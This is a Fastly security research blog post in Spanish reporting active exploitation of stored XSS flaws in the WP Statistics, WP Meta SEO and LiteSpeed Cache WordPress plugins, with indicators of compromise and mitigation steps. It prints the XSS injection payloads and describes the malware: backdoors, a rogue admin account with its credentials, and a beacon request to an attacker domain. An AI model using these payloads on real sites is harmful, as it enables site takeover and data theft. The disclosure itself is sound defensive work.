Los desarrolladores son el futuro de las empresas

Aprende más
EmpresaEl equipo que está detrás de las mejores experiencias onlineMapa de la redUna nueva arquitectura para un internet modernoRelaciones con analistas del sectorDescubre lo que los analistas del sector opinan de FastlyNoticiasNoticias y anuncios recientesPlataformaLa plataforma que impulsa la calidad, la velocidad y la seguridad de las experiencias digitalesHistorias de clientesAsí es como se alcanza el éxito en internetEventosAsiste a eventos en el que participa FastlyVacantesÚnete al equipo que está mejorando internet

La plataforma de edge cloud de Fastly

Ver todos los productos
Distribución de contenidos (CDN)Ofrece experiencias rápidas y personalizadas en todo el mundoStreaming en directoOfrece experiencias de streaming en vivo sin interrupcionesStreaming de vídeo bajo demandaOfrece las mejores experiencias de vídeo bajo demandaMedia Shield Optimiza los despliegues de múltiples CDNOn-The-Fly PackagerEmpaquetado de vídeo dinámico y en tiempo realImage OptimizerProcesamiento rápido de imágenes en el bordeEquilibrador de cargaControl pormenorizado sobre las decisiones de enrutamientoCifrado TLSSimplifica la gestión de TLSOrigin Connect Disfruta de línea directa con FastlyDirecciones IPGestiona fácilmente las direcciones IPHTTP3 y QUICProtocolos modernosAPI de investigación de dominiosDescubrimiento instantáneo y preciso de nombres de dominioObject StorageGet direct access to large files at the edge with zero egress fees
WAF de última generaciónSeguridad moderna para API y aplicaciones web en cualquier entornoBot ManagementDetección y mitigación de ataques de botsDDoS ProtectionMitigación automática de ataques disruptivos y distribuidosSeguridad de APIProtege los puntos de conexión de tus APIProtección en el lado del clienteDefiéndete ante ataques en el lado del clienteAI Bot ManagementEvita que los bots con IA rastreen el contenido de una web
Informática en el bordePasa tus aplicaciones al borde: nuestra plataforma instantánea te ayudará a crear experiencias increíbles para tus usuariosKey Value StoreUn almacén de clave-valor rápido a más no poder y tan fácil de usar como las herramientas de bases de datos que ya conocesWebSockets y Fanout Mensajería instantánea a escala mundial con personalización integral y configuración sencillaSDK para desarrolladoresPrograma los mismos servicios que usamos para crear productos de FastlyEnterprise sin servidoresLa plataforma sin servidores más potente, creada con normas abiertas e integrada con toda la gama de productos de FastlyIAAcelera tus cargas de trabajo de IA y mejora la eficiencia con el almacenamiento semántico en cachéObject StorageGet direct access to large files at the edge with zero egress feesCaché programableObtén acceso programático completo a la misma caché legendaria que impulsa nuestra CDN.Servidor MCPControl por IA para tus servicios Fastly.
Registros en tiempo realEnvío y análisis de registros en tiempo realEdge ObserverDatos históricos y en tiempo real sobre el tráficoDomain InspectorEvaluación de datos a nivel de dominioOrigin InspectorDatos exhaustivos desde el origen hasta el edgeAlertasCrea notificaciones acerca de métricas de serviciosLog Explorer &amp; InsightsInteractúa con datos prácticos

Un servicio tan extraordinario como los resultados

Ver todos los servicios
Servicios profesionalesAsistencia experta para migrar u optimizar tu servicio de distribuciónServicios de entretenimiento en vivoExperiencias de streaming en vivo que se adaptan a tu públicoPlanes de soporteUna asistencia inmejorable de principio a finCDN gestionadaControl y flexibilidadManaged SecurityUna protección para aplicaciones web gestionada por expertosAtención al clienteEl soporte de Fastly te ayuda a crecer como nunca

Soluciones digitales innovadoras

Descubre todas nuestras soluciones
Streaming de contenido multimediaExperiencias de cine con el streaming en vivo y bajo demandaNuevos contenidos multimediaAlto rendimiento para los medios de comunicación del mañanaPrensa digitalContenidos en tiempo real y mejor experiencia para los lectoresRetail y comercio electrónicoExperiencias personalizadas al vuelo y a escalaServicios financierosSeguridad integrada para proteger los datos de los clientesTecnología puntaEscalabilidad instantánea al ritmo de tu crecimientoTurismo y hosteleríaExperiencias online personalizadas para tus huéspedes y viajerosFormación onlineExperiencias de aprendizaje seguras y a escalaVideojuegosImpulsa la próxima victoria de tus jugadores con descargas de juegos ultrarrápidas y segurasiGamingDistribuye experiencias de juego rápidas, seguras, ininterrumpidas y atractivas en el borde
Ahorro en infraestructuraHaz que tus gastos en la nube sean más bajos y predeciblesOptimización multinubeReduce la complejidad y unifica tus recursos en la nubeConfianza de los clientesMás información sobre las iniciativas de confianza de los clientes de FastlySoluciones de privacidadDescubre cómo puedes proteger los datos de tus usuariosPanel de sostenibilidadConsulta tu consumo de electricidad y tus emisiones de GEI en la plataforma de Fastly

Herramientas para desarrollar experiencias a lo grande

Prueba Fastly gratis
DesarrolladoresNo esperes más para crear algo increíbleFast ForwardA la vanguardia de la seguridad en internetHerramientas de desarrolloLas mejores herramientas para los mejores equiposSDK para desarrolladoresPrograma los mismos servicios que usamos para crear productos de FastlyComunidadInteractúa con desarrolladores de todo el mundoRegistrarseCrea una cuenta de desarrollo gratuita

Ayuda a hacer de internet un lugar más rápido, seguro y atractivo con Fastly

Por qué colaborar con FastlyAyuda a ofrecer experiencias rápidas, seguras y atractivasPartners de la nubeConoce las ventajas de combinar Fastly con tus servicios en la nubePartners de canalAmplía tu oferta y tus posibilidades con los productos de FastlyPartners de tecnología e integraciónDescubre nuestro ecosistema de partners
Accede al portal de partnersEncuentra todos los recursos para partners de Fastly en un único lugarConviértete en partnerImpulsa tu negocio distribuyendo o recomendando los productos de FastlyEncuentra un partnerTe ayudamos a encontrar el partner que necesitas

Obtén ayuda con Fastly

DocumentaciónSaca todo el partido a FastlyBiblioteca de recursosAccede a hojas de datos, informes y mucho másFastly AcademyAprendizaje práctico sobre los productos de FastlyCentro de aprendizajeConoce la tecnología que impulsa lo mejor de internetBlogNuestras reflexiones e ideas más recientesInvestigación de seguridadSeguridad reforzada por medio de la investigaciónPunto de vista de Fastly Explora conocimientos de los expertos y del sector
Centro de soporteEstamos a tu disposiciónContactoHabla con nosotros hoy mismo
Volver al blog

Síguenos y suscríbete

Aprovechamiento de vulnerabilidades de scripting entre sitios almacenado sin autenticación en complementos de WordPress

Equipo de Security Research de Fastly

Equipo de Security Research de Fastly, Fastly

Simran Khalsa

Staff Security Researcher

Xavier Stevens

Staff Security Researcher, Fastly

Matthew Mathur

Senior Security Researcher, Fastly

SeguridadInformación del sector

Hemos observado intentos de aprovechamiento de tres vulnerabilidades y exposiciones comunes (CVE) de alta gravedad: CVE-2024-2194, CVE-2023-6961 y CVE-2023-40000. Estas vulnerabilidades están presentes en varios complementos de WordPress y son susceptibles a ataques de scripting entre sitios almacenado sin autenticación debido a deficiencias en el saneamiento de las entradas y el escape de las salidas, que permiten inyectar scripts maliciosos.

Las cargas útiles de los ataques dirigidos a estas vulnerabilidades inyectan una etiqueta de script que señala a un archivo ofuscado de JavaScript alojado en un dominio externo. El script utilizado para aprovechar estas vulnerabilidades es siempre el mismo. Estas son sus principales acciones con fines maliciosos:

  1. Creación de una nueva cuenta de administrador

  2. Inyección de puertas traseras

  3. Instalación de scripts de rastreo, posiblemente para supervisar los sitios infectados 

Hemos observado una cantidad elevada de intentos de aprovechamiento que tienen su origen en direcciones IP asociadas al sistema autónomo de Volume Inc. y que se concentran en los Países Bajos. Además, hemos identificado cinco dominios a los que se hace referencia en las cargas útiles de los ataques. En la última fase de rastreo se emplean otros dos dominios que han estado vinculados a otros aprovechamientos de complementos de WordPress, como se puede ver aquí y aquí.

Detalles de las vulnerabilidades

CVE-2024-2194

El complemento WP Statistics (versiones 14.5 y anteriores) queda expuesto al scripting almacenado entre sitios mediante el parámetro de búsqueda de URL.

utm_id="><script src="https://{CALLBACK_DOMAIN}/"></script>

Esta vulnerabilidad permite que atacantes sin autenticar utilicen este parámetro para inyectar scripts web arbitrarios que se ejecutan cuando un usuario accede a la página inyectada. El atacante envía una y otra vez peticiones con esta carga útil para asegurarse de que aparezca en las páginas más visitadas, para lo cual añade el parámetro «utm_id» a dichas peticiones.

Tim Coen informó de esta vulnerabilidad el 11 de marzo de 2024. El complemento WP Statistics acumula más de 600 000 instalaciones en activo. Según las estadísticas, las versiones anteriores a la 14.5 siguen activas en aproximadamente el 48 % de los sitios web que utilizan el complemento. 

CVE-2023-6961

El complemento WP Meta SEO (versiones 4.5.12 y anteriores) es susceptible a ataques de scripting almacenado entre sitios mediante el encabezado Referer HTTP.

Referer: <script src="https://{CALLBACK_DOMAIN}/"></script>

El atacante envía esta carga útil a la página objetivo, que suele generar una respuesta 404. Acto seguido, el complemento WP Meta SEO inserta este encabezado sin sanear en la base de datos para rastrear los redireccionamientos. Cuando un administrador carga la página 404 con redireccionamiento, el script obtiene un objeto ofuscado de JavaScript del dominio que efectúa devoluciones de llamada y lo ejecuta en el navegador de la víctima. Si esta persona está autenticada y, por ejemplo, se trata de un administrador de WP que ha iniciado sesión, sus credenciales quedan expuestas a acciones maliciosas.

Krzysztof Zając, investigador de CERT PL, informó de esta vulnerabilidad el 16 de abril de 2024. El complemento WP Meta SEO acumula más de 20 000 instalaciones en activo y, según las estadísticas, las versiones anteriores a la 4.5 siguen activas en aproximadamente el 27 % de los sitios web que lo utilizan.

CVE-2023-40000

El complemento LiteSpeed Cache (versiones 5.7.0.1 y anteriores) de WordPress es vulnerable al scripting almacenado entre sitios mediante los parámetros «nameservers» y «_msg».

result[_msg]=<script src="https://{CALLBACK_DOMAIN}/"></script>

La vulnerabilidad se activa cuando un administrador accede a cualquier página del backend, ya que la carga útil correspondiente se hace pasar por una notificación dirigida a esta persona. Esto provoca que el script malicioso se ejecute con sus credenciales y tenga vía libre para actuar.

Patchstack informó de esta vulnerabilidad en febrero de 2024. El complemento LiteSpeed Cache está muy extendido y acumula más de 5 millones de instalaciones en activo. Según las estadísticas, las versiones anteriores a la 5.7 siguen activas en el 15,7 % de los sitios web que utilizan el complemento, por lo que están en situación de riesgo una cantidad considerable de sitios. 

Malware de JavaScript

Los contenidos del archivo de JavaScript malicioso llevan a cabo las siguientes acciones:

  1. Inyección de puertas traseras de PHP maliciosas

    • En archivos de complementos

    • En archivos de temas

  2. Creación de una nueva cuenta de administrador

    • Envío de una petición a la instalación de WordPress en el servidor para la creación de una nueva cuenta de administrador

  3. Comienzo del rastreo

    • Puesta en marcha del rastreo mediante Yandex, ya sea a través de JavaScript o un píxel de rastreo

Figura 1: fragmento de una carga útil maliciosa de JavaScript

El script de PHP malicioso lleva a cabo las siguientes acciones:

  1. Inyección de script de rastreo

    • Búsqueda recursiva de wp-loads.php e inyección en wp-config.php de:

      <script src="https://{TRACKING_DOMAIN}/"></script>

  2. Creación de un nuevo usuario con privilegios de administrador de WordPress

    • Nombre de usuario: admim

    • Contraseña**: 7F9SzCnS6g3AFLAO39Ro**

    • Correo electrónico**: admim@mystiqueapi[.]com**

  3. Rastreo de hosts infectados

    • Envío de una petición GET a:

      hxxp://ur.mystiqueapi[.]com/?ur=<$_SERVER['HTTP_HOST']>

    • Rastreo de hosts infectados mediante la obtención de la información de sus hosts HTTP

Actividad de los atacantes

CVE-2024-2194

Figura 2: actividad de ataque de CVE-2024-2194

El dominio media.cdnstaticjs[.]com está vinculado al aprovechamiento de CVE-2024-2194. Hemos observado ataques a esta vulnerabilidad de 17 direcciones IP diferentes que tienen su origen principalmente en AS202425 (IP Volume Inc.) y AS210848 (Telkom Internet LTD) y se concentran en los Países Bajos.

CVE-2023-6961

Figura 3: actividad de ataque de CVE-2023-6961

El dominio idc.cloudiync[.]com está vinculado al aprovechamiento de CVE-2023-6961. Hasta la fecha, más de 5000 millones de peticiones procedentes de una única dirección IP han intentado aprovecharse de esta vulnerabilidad, que tiene su origen en el sistema autónomo AS202425 (IP Volume Inc.). Además, hemos observado que media.cdnstaticjs[.]com se ha estado utilizando en cargas útiles maliciosas dirigidas a esta vulnerabilidad desde el 16 de mayo. Este dominio también se emplea en ataques dirigidos a CVE-2024-2194.

CVE-2023-40000

Figura 4: Actividad maliciosa de CVE-2023-40000

Los dominios cloud.cdndynamic[.]com, go.kcloudinc[.]com y cdn.mediajsdelivery[.]com están relacionados con el aprovechamiento de CVE-2023-40000. El último ataque vinculado al dominio cdn.mediajsdelivery[.]com se observó el 15 de abril. Desde entonces, los dominios cloud.cdndynamic[.]com y go.kcloudinc[.]com son los únicos que se han utilizado en ataques dirigidos a esta vulnerabilidad.

A diferencia de lo que ocurre con las dos vulnerabilidades anteriores, el aprovechamiento malicioso de CVE-2023-40000 está más repartido entre distintas direcciones IP y sistemas autónomos. Hemos observado ataques de 1664 direcciones IP diferentes que tienen su origen principalmente en AS210848 (Telkom Internet LTD) y AS202425 (IP Volume Inc.) y se concentran sobre todo en los Países Bajos.

Rastreo de dominios

El dominio assets.scontentflow[.]com, registrado poco después de que el listado de CVE-2023-6961 se hiciera público, es el que se escribe principalmente en sitios infectados mediante cargas útiles procedentes de idc.cloudiync[.]com. Nuestros estudios indican que apenas hay páginas web con esta carga útil, por lo que su nivel de infección ha sido muy limitado hasta la fecha. 

El dominio cache.cloudswiftcdn[.]com se registró antes de que los tres conjuntos de CVE se hicieran públicos. Las cargas útiles que hacen referencia a este dominio tienen una estructura similar a otras observadas, con la diferencia de que incorporan 40 temas más con el objetivo de crear puestas traseras. Según los estudios de PublicWWW, más de 3000 páginas contienen este script. Si tenemos en cuenta que se registraron con bastante antelación, es posible que se lleven utilizando más tiempo o que el plazo de las infecciones sea más largo.

Indicadores de compromiso (IOC)

Dominios

Los siguientes dominios están relacionados con los intentos de aprovechamiento de estas vulnerabilidades:

media.cdnstaticjs[.]com
cloud.cdndynamic[.]com
idc.cloudiync[.]com
cdn.mediajsdelivery[.]com
go.kcloudinc[.]com
assets.scontentflow[.]com
cache.cloudswiftcdn[.]com

Direcciones IP 

Las siguientes direcciones IP están relacionadas con los intentos de aprovechamiento de estas vulnerabilidades (la lista no es exhaustiva):

80.82.76[.]214
31.43.191[.]220
94.102.51[.]144
94.102.51[.]95
91.223.82[.]150
185.7.33[.]129
101.99.75[.]178
94.242.61[.]217
80.82.78[.]133
111.90.150[.]154
103.155.93[.]120
185.100.87[.]144
185.162.130[.]23
101.99.75[.]215
111.90.150[.]123
103.155.93[.]244
185.209.162[.]247
179.43.172[.]148
185.159.82[.]103
185.247.226[.]37
185.165.169[.]62

Pautas para la mitigación

Comprueba los complementos que tienes instalados, aplica todas las actualizaciones disponibles y elimina las carpetas asociadas a los complementos sospechosos.

Fíjate bien en los usuarios con privilegios de administrador y asegúrate de que ninguno tenga el nombre admim y el correo electrónico admim[@]mystiqueapi[.]com.

Inspecciona todos los archivos para ver si se han realizado modificaciones imprevistas, sobre todo si contienen scripts sospechosos. Busca el siguiente código inyectado:

<script src="hxxps://assets.scontentflow[.]com"</script>
<script src="hxxps://cache.cloudswiftcdn[.]com"</script>

Mira si hay alguna petición saliente que no cuadre, sobre todo si su destino es un enlace de rastreo de Yandex o http://ur.mystiqueapi\[.\]com/?ur.

Si detectas alguno de estos indicios, eso significa que tu sitio web ha estado expuesto al aprovechamiento de alguna de estas vulnerabilidades.

Clientes de Fastly

Los clientes que disponen del WAF de última generación de Fastly pueden buscar estos indicios en sus registros de ataque para saber si han estado expuestos. Los intentos de aprovechamiento de los tres conjuntos de CVE se detectan de forma predeterminada y se señalan como scripting entre sitios (XSS). Los siete dominios asociados a los intentos de aprovechamiento se identifican mediante la señal de dominio fuera de banda (OOB-DOMAIN).

Además, las direcciones IP desde las que se envían los ataques se comparten entre todas las redes de los clientes del WAF de última generación gracias al Network Learning Exchange (NLX) de Fastly. Si quieres tomar más medidas al respecto o aumentar el nivel de inteligencia ante estos ataques, puedes utilizar estos indicadores para crear reglas personalizadas.

¿Listo para empezar?

Ponte en contacto con nosotros
Habla con un experto